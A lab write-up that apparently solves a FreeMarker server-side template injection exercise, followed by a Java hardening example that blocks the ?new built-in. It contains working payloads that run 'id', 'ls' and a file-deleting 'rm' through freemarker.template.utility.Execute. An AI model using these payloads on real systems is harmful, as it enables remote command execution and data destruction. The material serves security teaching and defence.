Lab Solution: Server-side template injection using documentation

First, we need to “View details” of a product and click “Edit template”. We can see that the template gets its data by using ${product.name}.

Changing it to ${a} and clicking “Preview” raises an exception that reveals the name of the template engine, which is FreeMarker.

According to @albinowax in Server-Side Template Injection, to execute the ‘id’ command, we inject:

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

Then we execute ‘ls’ and see that there is a file named ‘morale.txt’.

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("ls") }

Remove the file with:

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm morale.txt") }
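
The payloads above work because FreeMarker's ?new built-in is allowed to instantiate freemarker.template.utility.Execute. As an added example (not part of the original write-up or the lab's code), this is how an application that renders user-edited templates can close that path; it assumes FreeMarker 2.3.x on the classpath, and the class and method names are hypothetical.

```java
import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;

import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.Map;

public class FreeMarkerNewBuiltinHardening {

    // Constructed sample: the template text from the write-up, as a user would submit it.
    static final String UNTRUSTED =
        "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ ex(\"id\") }";

    static Configuration hardened() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_31);
        // The default is UNRESTRICTED_RESOLVER, which lets ?new load any TemplateModel class.
        // ALLOWS_NOTHING_RESOLVER makes every ?new fail; SAFER_RESOLVER is the weaker option
        // that only blocks Execute, ObjectConstructor and JythonRuntime.
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
        return cfg;
    }

    static String render(Configuration cfg, String source) throws IOException {
        Template t = new Template("user-edited", new StringReader(source), cfg);
        StringWriter out = new StringWriter();
        try {
            // Constructed data model standing in for the lab's product object.
            t.process(Map.of("product", Map.of("name", "Sample product")), out);
            return out.toString();
        } catch (TemplateException e) {
            // Return a fixed message: the verbose exception is what disclosed the engine.
            return "[template rejected]";
        }
    }

    public static void main(String[] args) throws IOException {
        Configuration cfg = hardened();
        System.out.println(render(cfg, "Name: ${product.name}")); // renders normally
        System.out.println(render(cfg, UNTRUSTED));               // ?new is refused
    }
}
```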
